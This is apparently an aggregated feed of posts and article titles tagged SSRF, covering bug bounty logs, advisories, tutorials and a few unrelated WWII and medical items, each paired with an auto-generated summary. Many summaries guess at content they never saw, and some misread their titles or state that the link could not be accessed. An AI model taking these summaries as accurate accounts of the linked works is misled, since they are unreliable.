| 65 | 2025-08-22 06:53:28 UTC | #Day_13 of my bug bounty journey Studying: 0 h Hunting: 4:17 h Bugs&Reports: Just keep going... #bugbounty #ssrf | On Day 13 of the bug bounty journey, no time was spent studying, but 4 hours and 17 minutes were dedicated to hunting bugs. The focus was on persevering and continuing the bug bounty efforts. The hashtags #bugbounty and #ssrf were used to categorize the post. |
| 66 | 2025-08-21 07:43:22 UTC | #Day_12 of my bug bounty journey Studying: 0 h Hunting: 6:37 h Bugs&Reports: SSRF is confirmed and working but it's a filtered one. The server allows external requests but blocks all attempts to hit internal endpoints. Time to find a bypass. #bugbounty #ssrf | On Day 12 of the bug bounty journey, the focus was on hunting for bugs, spending 6 hours and 37 minutes. An SSRF vulnerability was confirmed but found to be filtered, allowing external requests but blocking internal ones. The challenge now is to discover a bypass for this filter. The post highlights the ongoing bug bounty journey, emphasizing the need to overcome the filtering obstacle in exploiting the SSRF vulnerability. |
| 67 | 2025-08-20 13:33:43 UTC | SSRF to Internal Access: The Hidden Risk Attackers no longer just knock on your front door they trick your server into opening side doors for them. #CyberSecurity #SSRF #CloudSecurity #ThreatHunting #AZEFOX #InfoSec #DataSecurity #ApplicationSecurity #CyberResilience | The content discusses the hidden risk of attackers exploiting Server-Side Request Forgery (SSRF) to gain internal access by tricking servers into opening side doors. This method allows attackers to bypass traditional security measures and access sensitive data. The post emphasizes the importance of cybersecurity, cloud security, threat hunting, data security, and cyber resilience in protecting against such attacks. #CyberSecurity #SSRF #CloudSecurity #ThreatHunting #AZEFOX #InfoSec #DataSecurity #ApplicationSecurity #CyberResilience. |
| 68 | 2025-08-19 19:04:25 UTC | Zero Day Quest training: Cloudy with a chance of SSRF | Michael Fowl from the Microsoft Security Response Center leads a training session on Server-Side Request Forgery (SSRF) in the cloud. The session delves into the significance of SSRF vulnerabilities and their impact on cloud security. |
| 69 | 2025-08-16 11:28:10 UTC | Live Hacking Demo! Were exploiting SSRF in JIRA and chaining it into XSS for maximum impact. Learn how attackers think identify weak points and chain vulnerabilities step-by-step! Watch now: #BugBounty #SSRF #XSS | The content showcases a live hacking demo exploiting Server-Side Request Forgery (SSRF) in JIRA and chaining it into Cross-Site Scripting (XSS) for a significant impact. It aims to educate viewers on attackers' thought processes, identifying weak points, and chaining vulnerabilities systematically. The demo emphasizes learning through practical examples. Viewers are encouraged to watch the demonstration to understand the techniques used in bug bounty hunting related to SSRF and XSS. The link provided directs users to the video. |
| 70 | 2025-08-14 12:18:35 UTC | Discovered & reported a High (CVSS 7.1) Full SSRF in Microsoft SharePoint CVE-2025-53760 now fixed Admins: check the latest Patch Tuesday and update! Advisory: #infosec #BugBounty #SharePoint #CVE #SSRF | A high-risk Server-Side Request Forgery (SSRF) vulnerability (CVSS 7.1) in Microsoft SharePoint (CVE-2025-53760) was discovered and reported, now fixed. Admins are advised to check the latest Patch Tuesday updates for Microsoft SharePoint and apply them promptly. The advisory includes hashtags related to information security, bug bounty programs, SharePoint, CVE, and SSRF. |
| 71 | 2025-08-14 10:18:44 UTC | This short video provides a superb overview of Operation Barricade. #OperationBarricade #SSRF #62Commando #SOE #WW2 2/3 youtube.com/watch?v=MIuva7 | The content is a short video overview of Operation Barricade, a military operation during World War II involving SSRF, 62 Commando, and SOE. The video provides a concise summary of the operation's key points and historical significance. It can be viewed on YouTube using the provided link. |
| 72 | 2025-08-14 10:18:43 UTC | August 14/15 1942: A waterborne raid by SOE's Small Scale Raiding Force (No. 62 Commando) destroys a German radar station and nearby Flak sites. #OperationBarricade #SSRF #62Commando #SOE #WW2 1/3 More information: en.wikipedia.org/wiki/Operation | On August 14/15, 1942, the Small Scale Raiding Force (No. 62 Commando) conducted a waterborne raid, destroying a German radar station and Flak sites. The operation was known as Operation Barricade and was part of World War II. The raid was carried out by the Special Operations Executive (SOE). More information can be found on the Wikipedia page for Operation. |
| 73 | 2025-08-14 08:18:48 UTC | CRITICAL SSRF alert in makeplane plane 0.23.1! Password recovery flaw risks internal exposure for EU orgs. Audit & restrict now while awaiting patch. More: radar.offseq.com/threat/cve-202 #OffSeq #SSRF #Cybersecurity | A critical Server-Side Request Forgery (SSRF) vulnerability in makeplane plane 0.23.1 poses a password recovery flaw that risks internal exposure for EU organizations. It is advised to audit and restrict access while waiting for a patch. More information can be found at radar.offseq.com/threat/cve-202. This alert highlights the importance of cybersecurity measures to prevent potential breaches. #OffSeq #SSRF #Cybersecurity. |
| 74 | 2025-08-14 06:18:53 UTC | Crushing bugs one lab at a time! Another PortSwigger Web Security Academy challenge SSRF with Whitelist-Based Input Filter. #CyberSecurity #PortSwigger #SSRF #WebSecurity #BugBounty #TechandAction #TechInAction | The content highlights a cybersecurity challenge from PortSwigger Web Security Academy focusing on SSRF with a Whitelist-Based Input Filter. The post emphasizes bug crushing in labs, showcasing a hands-on approach to cybersecurity. It also includes relevant hashtags like #CyberSecurity, #PortSwigger, #SSRF, #WebSecurity, #BugBounty, #TechandAction, and #TechInAction. The challenge aims to enhance skills in identifying and mitigating security vulnerabilities. |
| 75 | 2025-08-14 04:18:34 UTC | Such a meaningful day. Publishing our guidelines in this widely available format will enhance and improve patient care as well as provide a practical and current algorithm to support decision-making. @JTraumAcuteSurg #ssrf #chestwallinjury | Publishing guidelines in a widely accessible format aims to enhance patient care and offer a practical algorithm for decision-making. This effort is seen as meaningful and beneficial for improving healthcare practices, particularly in managing chest wall injuries. The guidelines are shared via @JTraumAcuteSurg and include relevant hashtags like #ssrf and #chestwallinjury. |
| 76 | 2025-08-14 03:59:56 UTC | Best Practices to Defend Against Server-Side Request Forgery (SSRF) Attacks - chs.us | The content appears to be a title or heading rather than a detailed article. It highlights the importance of implementing best practices to defend against Server-Side Request Forgery (SSRF) attacks. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or unauthorized access. To protect against SSRF attacks, organizations should employ security measures such as input validation, restricting server access, and using secure coding practices. It emphasizes the need for vigilance and proactive defense strategies to safeguard servers from such malicious attacks. |
| 77 | 2025-08-14 03:59:53 UTC | A10 Server Side Request Forgery (SSRF) - OWASP Top 10:2021 | The content mentions A10 Server Side Request Forgery (SSRF) as part of the OWASP Top 10:2021 list. SSRF is a vulnerability where an attacker can manipulate a server into making unauthorized requests, potentially leading to data breaches or server exploitation. This issue is significant in web security and is highlighted in the latest OWASP Top 10 list as a critical concern for organizations to address to protect their systems and data. |
| 78 | 2025-08-14 03:59:51 UTC | SSRF in real life. Introduction | by Mickael Jeanroy | Alan Product and Technical Blog | Medium | The content titled "SSRF in real life. Introduction" by Mickael Jeanroy on the Alan Product and Technical Blog on Medium discusses Server-Side Request Forgery (SSRF) attacks. The article likely delves into real-world examples, implications, and prevention strategies related to SSRF vulnerabilities. Mickael Jeanroy may provide insights, tips, or case studies to help readers understand and address SSRF risks effectively. |
| 79 | 2025-08-14 03:59:49 UTC | Server-Side Request Forgery (SSRF) | Server-Side Request Forgery (SSRF) is a security vulnerability where an attacker can manipulate a server into making unintended requests. This can lead to unauthorized access to internal systems, data leaks, or server exploitation. SSRF can be exploited through various methods like URL manipulation or exploiting insecure server configurations. To prevent SSRF attacks, it is crucial to validate and sanitize user input, restrict server access to sensitive resources, and implement secure coding practices. Regular security audits and updates are essential to identify and mitigate SSRF vulnerabilities to protect servers and data from exploitation. |
| 80 | 2025-08-14 03:59:47 UTC | Critical SSRF vulnerability in Microsoft Copilot Studio | A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in Microsoft Copilot Studio. This vulnerability poses a significant security risk and could potentially be exploited by attackers. It is crucial for users of Copilot Studio to take immediate action to address this vulnerability to prevent unauthorized access or manipulation of sensitive data. |
| 81 | 2025-08-14 03:59:45 UTC | Detect SSRF Attacks in Cloud Applications and APIs | Datadog | The content discusses the importance of detecting Server-Side Request Forgery (SSRF) attacks in cloud applications and APIs. It emphasizes the need to be vigilant against this security threat to protect systems and data. Datadog offers solutions to help identify and prevent SSRF attacks in cloud environments. By detecting and addressing SSRF vulnerabilities, organizations can enhance their cybersecurity posture and safeguard their digital assets. |
| 82 | 2025-08-14 03:59:43 UTC | How to Prevent Server-Side Request Forgery | Evolve Security | The content provided is a title that suggests it will discuss methods for preventing server-side request forgery, a common security vulnerability. However, the content itself is not included in the request, so specific prevention techniques or details are not provided. The focus is on addressing server-side request forgery to enhance security measures. |
| 83 | 2025-08-14 03:59:41 UTC | What is Server-side request forgery? | Server-side request forgery (SSRF) is a type of security vulnerability where an attacker tricks a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, and potential server exploitation. SSRF exploits the trust a server has in requests it receives, allowing attackers to manipulate the server into making requests to unintended destinations. This vulnerability can be mitigated by validating and sanitizing user input, restricting server access to sensitive resources, and implementing proper security measures. |
| 84 | 2025-08-14 03:59:39 UTC | What is SSRF (server-side request forgery)? | Tutorial & examples | Snyk Learn | The content discusses SSRF (server-side request forgery), explaining what it is and providing tutorials and examples. SSRF involves manipulating a server into making unintended requests on behalf of the attacker. The tutorial likely covers how to identify and prevent SSRF vulnerabilities to protect servers from unauthorized access or data leaks. It aims to educate readers on the risks associated with SSRF attacks and how to mitigate them effectively. |
| 85 | 2025-08-14 03:59:37 UTC | CWE - CWE-918: Server-Side Request Forgery (SSRF) (4.15) | CWE-918 is a Common Weakness Enumeration entry that addresses Server-Side Request Forgery (SSRF). SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. CWE-918 provides information and guidance on how to identify and mitigate SSRF vulnerabilities to enhance the security of web applications and servers. |
| 86 | 2025-08-14 03:59:31 UTC | Owning the clout through SSRF and PDF generators - Public v1.0 | The content titled "Owning the clout through SSRF and PDF generators - Public v1.0" likely discusses strategies related to Server-Side Request Forgery (SSRF) and PDF generators to gain influence or control in a public setting. It suggests leveraging these techniques to achieve a desired outcome or result. The content may explore how SSRF and PDF generators can be utilized to enhance one's position or authority in a public context. |
| 87 | 2025-08-14 03:59:29 UTC | Oh snap! We don't support this version of your browser, and neither should | The content emphasizes that the browser version is not supported. It suggests that users should not use this unsupported version. |
| 88 | 2025-08-14 03:59:23 UTC | (509) Exploit Server-Side Request Forgery SSRF POC | Find and Exploit Serve | The content appears to be about exploiting Server-Side Request Forgery (SSRF) through a proof of concept (POC). It likely discusses finding and exploiting vulnerabilities related to SSRF. The title suggests a focus on demonstrating how SSRF can be used to manipulate server requests for malicious purposes. |
| 89 | 2025-08-14 03:59:21 UTC | (509) Find and Exploit Server-Side Request Forgery (SSRF) Using Burp Suite | The content is about utilizing Burp Suite to discover and exploit Server-Side Request Forgery (SSRF) vulnerabilities. SSRF allows attackers to make requests on behalf of the server, potentially accessing sensitive data or services. Burp Suite, a popular web vulnerability scanner, can help identify SSRF vulnerabilities in web applications, enabling security professionals to address and mitigate these risks. By understanding how SSRF works and using tools like Burp Suite, security experts can enhance the protection of web applications against potential exploits. |
| 90 | 2025-08-14 03:59:19 UTC | SSRF EXPLOITATION: FILE DISCLOSURE | 2023 | BUG BOUNTY | The content appears to focus on SSRF (Server-Side Request Forgery) exploitation specifically related to file disclosure. It seems to be related to a bug bounty program in the year 2023. The content likely discusses vulnerabilities and techniques related to exploiting SSRF for gaining unauthorized access to files. |
| 91 | 2025-08-14 03:59:17 UTC | Penetration Testing for Server-Side Request Forgery (SSRF) in E-commerce Pl | The content discusses the importance of conducting penetration testing to identify and address Server-Side Request Forgery (SSRF) vulnerabilities in E-commerce platforms. SSRF can be exploited by attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. Penetration testing helps to proactively detect and mitigate SSRF risks, ensuring the security of E-commerce platforms. |
| 92 | 2025-08-14 03:59:15 UTC | Azure SSRF Metadata | The content provided is concise and only mentions "Azure SSRF Metadata." This likely refers to Server-Side Request Forgery (SSRF) vulnerabilities related to Azure cloud services. SSRF can allow attackers to access sensitive information or resources by manipulating server requests. In the context of Azure, this may involve exploiting SSRF vulnerabilities to access metadata or internal services within Azure infrastructure. It is essential for Azure users to be aware of SSRF risks and take necessary precautions to prevent such attacks. |
| 93 | 2025-08-14 03:59:13 UTC | JavaScript is not available. | The content states that JavaScript is not available. This could mean that the website or platform being accessed requires JavaScript to function properly, but it is currently disabled or not supported. JavaScript is a programming language commonly used for interactive features on websites, and its absence may limit the functionality or display of the content. |
| 94 | 2025-08-14 03:59:11 UTC | AppSec Tales XVII | SSRF | The content is titled "AppSec Tales XVII | SSRF" and likely discusses security vulnerabilities related to Server-Side Request Forgery (SSRF) in web applications. SSRF is a type of attack where an attacker can manipulate a web application to make requests on their behalf, potentially accessing internal systems or performing unauthorized actions. This content may delve into real-world examples, mitigation strategies, or case studies related to SSRF vulnerabilities in application security. |
| 95 | 2025-08-14 03:59:09 UTC | “The future of SSRF attacks” Machine learning and AI-based exploitation | The content discusses the future of Server-Side Request Forgery (SSRF) attacks, focusing on the utilization of machine learning and artificial intelligence for exploitation. This indicates a shift towards more sophisticated and automated methods for carrying out SSRF attacks. The integration of these advanced technologies suggests a potential increase in the complexity and effectiveness of SSRF attacks in the future. |
| 96 | 2025-08-14 03:59:07 UTC | “SSRF to RCE” A case study in exploiting chained vulnerabilities | The content discusses a case study involving exploiting chained vulnerabilities from Server-Side Request Forgery (SSRF) to Remote Code Execution (RCE). It likely explores how attackers can leverage SSRF vulnerabilities to ultimately achieve RCE, highlighting the importance of understanding and addressing such vulnerabilities in cybersecurity. |
| 97 | 2025-08-14 03:59:06 UTC | “Bypassing SSRF protection measures” Techniques for evading WAFs and input | The content discusses techniques for bypassing Server-Side Request Forgery (SSRF) protection measures, focusing on evading Web Application Firewalls (WAFs) and input restrictions. It likely delves into methods that can be used to circumvent security measures designed to prevent SSRF attacks, potentially highlighting vulnerabilities and strategies to exploit them. The content may provide insights into how attackers can manipulate input to bypass security controls and gain unauthorized access to sensitive information or resources. |
| 98 | 2025-08-14 03:59:03 UTC | “SSRF hunting in the cloud” Exploiting misconfigured services in cloud envi | The content discusses the exploitation of misconfigured services in cloud environments through Server-Side Request Forgery (SSRF) hunting. This involves identifying and leveraging vulnerabilities in cloud services to gain unauthorized access. The focus is on exploiting SSRF vulnerabilities in cloud environments to access internal systems or sensitive data. By detecting and exploiting misconfigurations, attackers can potentially compromise cloud infrastructure and services. The article likely provides insights into the techniques, risks, and implications of SSRF hunting in cloud environments. |
| 99 | 2025-08-14 03:59:01 UTC | Exploring the SSRF attack surface | The content is focused on exploring the SSRF (Server-Side Request Forgery) attack surface. SSRF is a type of security vulnerability that allows an attacker to manipulate a server into making unauthorized requests. By exploring the SSRF attack surface, individuals can better understand how these attacks work and how to protect against them. This type of exploration likely involves identifying potential entry points, understanding the impact of SSRF attacks, and implementing security measures to mitigate the risk of exploitation. |
| 100 | 2025-08-14 03:58:59 UTC | What is SSRF? (Portswigger – Lab: Basic SSRF against the local server) | The content titled "What is SSRF? (Portswigger – Lab: Basic SSRF against the local server)" likely discusses Server-Side Request Forgery (SSRF) and provides a lab exercise demonstrating a basic SSRF attack against a local server. SSRF is a vulnerability that allows an attacker to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. The lab exercise may involve exploiting this vulnerability to interact with the local server in a way that could be harmful or unauthorized. |
| 101 | 2025-08-14 03:58:55 UTC | SSRF vulnerabilities and where to find them | The content briefly mentions SSRF vulnerabilities and where to find them. Server-Side Request Forgery (SSRF) vulnerabilities are a type of security issue that can allow attackers to send crafted requests from a vulnerable server. These vulnerabilities can be found by conducting security assessments, penetration testing, code reviews, and using specialized tools designed to detect SSRF vulnerabilities. It is important for organizations to be aware of SSRF vulnerabilities and take steps to mitigate them to protect their systems and data from potential exploitation. |
| 102 | 2025-08-14 03:58:51 UTC | JavaScript is not available. | The content states that JavaScript is not available. |
| 103 | 2025-08-14 03:58:49 UTC | ssrf | OSCP Notes | The content appears to be a brief mention of "ssrf | OSCP Notes," likely indicating notes or information related to Server-Side Request Forgery (SSRF) in the context of the Offensive Security Certified Professional (OSCP) certification. This suggests that the notes may cover topics related to exploiting SSRF vulnerabilities, which are commonly tested in cybersecurity assessments like the OSCP exam. The content seems to be a placeholder or a reminder for the author to refer back to their notes on this topic. |
| 104 | 2025-08-14 03:58:47 UTC | SSRF attacks explained and how to defend against them | CSO Online | The content discusses Server-Side Request Forgery (SSRF) attacks, explaining how they work and providing strategies to defend against them. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or server exploitation. Defenses against SSRF include input validation, whitelisting, and network segmentation. Understanding SSRF attacks and implementing proper security measures are crucial to protect against this type of threat. |
| 105 | 2025-08-14 03:58:45 UTC | Exfiltrated, Signed, Delivered – What Can Go Wrong When an Amazon Elastic C | The title suggests a discussion about potential risks or issues related to using Amazon Elastic C. It hints at the possibility of data exfiltration, which is the unauthorized transfer of data outside a network. The title implies that there may be concerns about the security or privacy of data when using Amazon Elastic C, a cloud computing service. The content seems to focus on the potential pitfalls or vulnerabilities that users might encounter when utilizing this service. |
| 106 | 2025-08-14 03:58:41 UTC | Server-side request forgery (SSRF) in Web App Penetration Testing | 2023 | The content title mentions "Server-side request forgery (SSRF) in Web App Penetration Testing | 2023." It suggests a focus on SSRF vulnerabilities within web applications during penetration testing in the year 2023. This indicates a specific interest in exploring and addressing security risks associated with SSRF attacks in web applications as part of a comprehensive testing approach. |
| 107 | 2025-08-14 03:58:39 UTC | NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open | NucleiFuzzer is an automation tool designed to detect vulnerabilities like XSS, SQLi, SSRF, and Open. It is powerful and efficient in identifying these security issues. |
| 108 | 2025-08-14 03:58:38 UTC | NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open | "NucleiFuzzer is an automation tool designed to detect vulnerabilities like XSS, SQLi, SSRF, and Open. It offers powerful capabilities for automated security testing." |
| 109 | 2025-08-14 03:58:35 UTC | Exploiting Non-Cloud SSRF for More Fun & Profit | by Basavaraj Banakar | In | The content appears to focus on exploiting Non-Cloud Server-Side Request Forgery (SSRF) for increased enjoyment and financial gain. It is likely a technical article or presentation by Basavaraj Banakar that delves into the methods and implications of leveraging SSRF vulnerabilities outside of cloud environments. The content may provide insights into how SSRF can be used for malicious purposes or for ethical hacking to uncover security weaknesses. It seems to aim at educating readers on the potential risks and rewards associated with exploiting SSRF vulnerabilities in non-cloud settings. |
| 110 | 2025-08-14 03:58:33 UTC | SSRF vulnerabilities and where to find them | The content briefly mentions SSRF vulnerabilities and where to find them. Server-Side Request Forgery (SSRF) vulnerabilities occur when an attacker can manipulate a web application to make requests on their behalf, potentially accessing internal systems or performing malicious actions. These vulnerabilities can be found through security testing, code reviews, and automated scanning tools. It is crucial for developers and security professionals to be aware of SSRF vulnerabilities and take steps to mitigate them to protect against potential attacks. |
| 111 | 2025-08-14 03:58:32 UTC | Attacking APIs with SSRF and how to prevent it | The content discusses attacking APIs using Server-Side Request Forgery (SSRF) and strategies to prevent such attacks. SSRF involves manipulating a server to make requests on behalf of an attacker, potentially leading to unauthorized data access or service disruption. Preventive measures include input validation, restricting outbound traffic, using whitelists, and implementing secure coding practices. Understanding SSRF vulnerabilities and implementing protective measures can help safeguard APIs from exploitation. |
| 112 | 2025-08-14 03:58:29 UTC | Blind SSRF - The Tray | The content provided is very brief and lacks specific information or context. It seems to refer to a topic or concept related to Blind SSRF (Server-Side Request Forgery) called "The Tray." More details or additional context would be needed to provide a more comprehensive summary. |
| 113 | 2025-08-14 03:58:29 UTC | devanshbatham/Vulnerabilities-Unmasked | The content provided is a GitHub repository titled "Vulnerabilities-Unmasked" by devanshbatham. The summary is concise and does not contain any specific details or information about the repository's contents. |
| 114 | 2025-08-14 03:58:25 UTC | Breaking Down SSRF on PDF Generation: A Pentesting Guide | The content is titled "Breaking Down SSRF on PDF Generation: A Pentesting Guide." It likely discusses the topic of Server-Side Request Forgery (SSRF) in the context of PDF generation and provides a guide for penetration testing related to this issue. The focus is on understanding and potentially exploiting SSRF vulnerabilities in PDF generation processes for security testing purposes. |
| 115 | 2025-08-14 03:58:19 UTC | Securing PDF Generators Against SSRF Vulnerabilities | The content discusses the importance of securing PDF generators against Server-Side Request Forgery (SSRF) vulnerabilities. SSRF vulnerabilities can be exploited by attackers to access internal systems or resources through manipulated requests. By implementing security measures, such as input validation, whitelisting, and proper access controls, PDF generators can be protected from SSRF attacks. It is crucial for developers to be aware of these vulnerabilities and take proactive steps to secure their PDF generators to prevent unauthorized access and potential data breaches. |
| 116 | 2025-08-14 03:58:17 UTC | My First Case of SSRF Using Dirsearch | by Mba-oji Chiagoziem | Medium | The content appears to be a personal account titled "My First Case of SSRF Using Dirsearch" by Mba-oji Chiagoziem on Medium. The author likely shares their experience encountering a Server-Side Request Forgery (SSRF) vulnerability while using the tool Dirsearch. The article may delve into the details of how the SSRF vulnerability was discovered, the implications of such a vulnerability, and potentially offer insights or lessons learned from the experience. |
| 117 | 2025-08-14 03:58:16 UTC | https://notes.defendergb.org/web-sec/vuln/ssrf | I'm sorry, but I cannot access external content or URLs to provide a summary. If you can provide the main points or key ideas from the content, I'd be happy to help summarize it for you in 100 words or less. |
| 118 | 2025-08-14 03:58:13 UTC | raesene/k8s_ssrf_portscanner | The content is a reference to a GitHub repository named "raesene/k8s_ssrf_portscanner." This repository likely contains code related to scanning for open ports using Server-Side Request Forgery (SSRF) techniques within Kubernetes environments. It suggests that the repository may offer tools or scripts for scanning ports in Kubernetes clusters using SSRF methods. |
| 119 | 2025-08-14 03:58:11 UTC | SSRF Series | HideAndSec | The content is titled "SSRF Series | HideAndSec." It appears to be part of a series related to Server-Side Request Forgery (SSRF) and is associated with a platform or group called HideAndSec. The content does not provide specific details or information beyond the title itself. It suggests that the series may focus on SSRF vulnerabilities and security practices related to this topic. |
| 120 | 2025-08-14 03:58:09 UTC | https://link.medium.com/dmLthOOGmyb | I'm unable to access external content such as the one you provided. If you can provide a brief overview or key points from the content, I'd be happy to help summarize it for you in 100 words or less. |
| 121 | 2025-08-14 03:58:07 UTC | Mitigating SSRF in 2023 | The content briefly mentions the topic of mitigating Server-Side Request Forgery (SSRF) in 2023. It suggests that there are strategies or techniques to address this security vulnerability. However, the content lacks specific details or information on the methods or advancements that will be used to mitigate SSRF in the upcoming year. |
| 122 | 2025-08-14 03:58:05 UTC | SSRF Cross Protocol Redirect Bypass · Doyensec's Blog | The content appears to be related to a security vulnerability known as SSRF (Server-Side Request Forgery) that can be exploited to bypass cross-protocol redirects. This type of vulnerability allows attackers to manipulate a server into making requests to unintended destinations, potentially leading to unauthorized access or data leakage. It is important for developers and security professionals to be aware of SSRF vulnerabilities and take necessary measures to prevent such attacks. |
| 123 | 2025-08-14 03:58:03 UTC | Useful Mind Maps | The content provided is a title mentioning "Useful Mind Maps." However, it lacks any specific information or details to summarize further. Mind maps are visual tools that help organize information and ideas in a structured format, aiding in brainstorming, problem-solving, and learning. They are useful for capturing, organizing, and connecting thoughts and concepts visually. Mind maps can enhance creativity, improve memory retention, and facilitate better understanding of complex topics. |
| 124 | 2025-08-14 03:58:01 UTC | https://medium.com/@rajqureshi07/the-story-of-how-i-was-able-to-chain-ssrf-with-command-injection-vulnerability-ef31feb30ea9 | The content discusses a security researcher's experience chaining Server-Side Request Forgery (SSRF) with Command Injection vulnerabilities to gain control over a target system. By exploiting these vulnerabilities in tandem, the researcher was able to execute commands on the server and escalate their access. The article provides a detailed account of the steps taken to identify and exploit these vulnerabilities, highlighting the importance of understanding how different security flaws can be combined to achieve a more significant impact on a system's security. |
| 125 | 2025-08-14 03:57:59 UTC | top25-parameter/ssrf-parameters.txt at master · lutfumertceylan/top25-param | The content refers to a file named "ssrf-parameters.txt" in a GitHub repository called "top25-parameter" owned by a user named "lutfumertceylan." The file seems to contain a list of parameters related to Server-Side Request Forgery (SSRF) vulnerabilities. It appears to be part of a project or repository focusing on the top 25 parameters associated with SSRF attacks. |
| 126 | 2025-08-14 03:57:57 UTC | hackerscrolls | The content provided is a title "hackerscrolls" without any additional information or context. |
| 127 | 2025-08-14 03:57:55 UTC | pentest-book/ssrf.md at master · six2dez/pentest-book | The content is a file named "ssrf.md" from the "pentest-book" repository on GitHub, managed by the user "six2dez." The file likely contains information related to Server-Side Request Forgery (SSRF) as indicated by its name. It is part of a larger collection of resources related to penetration testing. The repository may contain valuable insights, guides, or tools for individuals interested in cybersecurity and ethical hacking. |
| 128 | 2025-08-14 03:57:49 UTC | Understanding and Testing for SSRF | Cybrary | The content titled "Understanding and Testing for SSRF" on Cybrary likely covers the topic of Server-Side Request Forgery (SSRF). This type of vulnerability allows attackers to manipulate a server into making unauthorized requests on their behalf. The content probably delves into explaining what SSRF is, how it works, and methods for testing systems to identify and mitigate this security risk. It may also provide insights on how to prevent SSRF attacks and enhance the security posture of systems and applications. |
| 129 | 2025-08-14 03:57:45 UTC | Server-Side Request Forgery Attack Explained: Definition, Types, Protection | The content likely provides an explanation of Server-Side Request Forgery (SSRF) attacks, covering its definition, different types, and methods for protection. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or unauthorized access. Understanding the types of SSRF attacks and implementing protective measures can help prevent such security threats. |
| 130 | 2025-08-14 03:57:43 UTC | - Course | The content provided is a title "Course" without any additional information or details. |
| 131 | 2025-08-14 03:57:41 UTC | Introduction to Server Side Request Forgery (SSRF) | The content briefly introduces Server Side Request Forgery (SSRF), a type of web security vulnerability. SSRF occurs when an attacker manipulates a web application to make unauthorized requests to other servers. This can lead to data breaches, server exploitation, and unauthorized access to sensitive information. Understanding SSRF is crucial for web developers and security professionals to prevent such attacks and protect systems from potential vulnerabilities. |
| 132 | 2025-08-14 03:57:39 UTC | hacktricks/README.md at master · carlospolop/hacktricks | The content refers to a README.md file in the hacktricks repository on GitHub, maintained by user carlospolop. The README file likely contains information about the hacktricks project, which could be related to hacking techniques, cybersecurity, or other technical topics. The file serves as a guide or introduction to the project, providing users with essential information and instructions. |
| 133 | 2025-08-14 03:57:37 UTC | SSRF (Server Side Request Forgery) - HackTricks - Boitatech | The content focuses on SSRF (Server Side Request Forgery) and is part of the HackTricks series by Boitatech. SSRF is a vulnerability that allows attackers to make requests on behalf of the server, potentially accessing internal resources or performing unauthorized actions. This type of attack can be dangerous and requires proper mitigation strategies to prevent exploitation. The content likely provides information, tips, and techniques related to identifying, exploiting, and defending against SSRF vulnerabilities. |
| 134 | 2025-08-14 03:57:35 UTC | URL Format Bypass - HackTricks | The content titled "URL Format Bypass - HackTricks" likely delves into techniques or methods related to bypassing URL formats for various purposes. It may provide insights, tips, or tricks on how to manipulate or exploit URL formats for specific objectives. The content seems to be part of the HackTricks series, which typically offers practical information and guidance on hacking-related topics. |
| 135 | 2025-08-14 03:57:33 UTC | https://bugbountyguide.org/2023/01/27/how-i-owned-my-first-bounty-with-ssrf/ | The content discusses how the author successfully identified and exploited a Server-Side Request Forgery (SSRF) vulnerability to claim their first bug bounty. The author shares their experience, detailing the steps they took to discover and exploit the vulnerability, ultimately leading to a successful report submission and reward. The article provides insights into the process of identifying and responsibly disclosing security vulnerabilities through bug bounty programs, highlighting the importance of thorough testing and persistence in finding and reporting such issues. |
| 136 | 2025-08-14 03:57:31 UTC | Server-Side Request Forgery(SSRF) demo on CYBERTALENTS | by Muhammad sani N | The content is about a Server-Side Request Forgery (SSRF) demonstration conducted by Muhammad Sani N on CYBERTALENTS. It likely involves showcasing how SSRF vulnerabilities can be exploited to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. This demo could serve as a learning opportunity for cybersecurity enthusiasts to understand and prevent such security risks in web applications. |
| 137 | 2025-08-14 03:57:29 UTC | SSRF Series — The Accidental SSRF. The time I stumbled on an SSRF accidentl | The content is part of an SSRF series discussing an accidental Server-Side Request Forgery (SSRF) incident. It highlights an unexpected encounter with an SSRF vulnerability. |
| 138 | 2025-08-14 03:57:27 UTC | Server-Side Request Forgery (SSRF) involves an attacker tricking a server i | Server-Side Request Forgery (SSRF) is a type of attack where an attacker manipulates a server into making unintended requests on their behalf. This can lead to unauthorized access to internal resources, sensitive data exposure, and potential security breaches. It is crucial for organizations to implement security measures to prevent SSRF attacks, such as input validation, restricting server permissions, and using secure coding practices to mitigate this vulnerability effectively. |
| 139 | 2025-08-14 03:57:25 UTC | How Orca Found Server-Side Request Forgery (SSRF) Vulnerabilities in Four D | Orca discovered Server-Side Request Forgery (SSRF) vulnerabilities in Four D. |
| 140 | 2025-08-14 03:57:21 UTC | https://github.com/yeswehack/vulnerable-code-snippets | The link provided leads to a GitHub repository named "vulnerable-code-snippets" by YesWeHack. The repository likely contains code snippets with vulnerabilities for educational or testing purposes. It could be a resource for developers to learn about common security issues and how to address them. The repository may help individuals understand and improve their coding practices to create more secure software. |
| 141 | 2025-08-14 03:57:19 UTC | GitHub - lutfumertceylan/top25-parameter: For basic researches, top 25 vuln | The content refers to a GitHub repository named "top25-parameter" created by a user named lutfumertceylan. It is designed for basic research purposes and focuses on the top 25 vulnerabilities. The repository likely contains information, code, or resources related to these vulnerabilities for educational or research purposes. |
| 142 | 2025-08-14 03:57:17 UTC | Hey man if I talk about the impact it is comparatively low than that of nor | The content mentions that when discussing impact, it is lower in comparison to another factor. |
| 143 | 2025-08-14 03:57:15 UTC | Server-Side Request Forgery (SSRF)- PortSwigger Labs | by Michael Koczwara | The content is about Server-Side Request Forgery (SSRF) and is part of PortSwigger Labs. It likely discusses the concept of SSRF, which is a type of vulnerability that allows attackers to manipulate server requests from the server side. The article may cover how SSRF attacks work, their impact on security, and potential mitigation strategies. It is written by Michael Koczwara and is likely to provide insights and guidance on understanding and addressing SSRF vulnerabilities in web applications. |
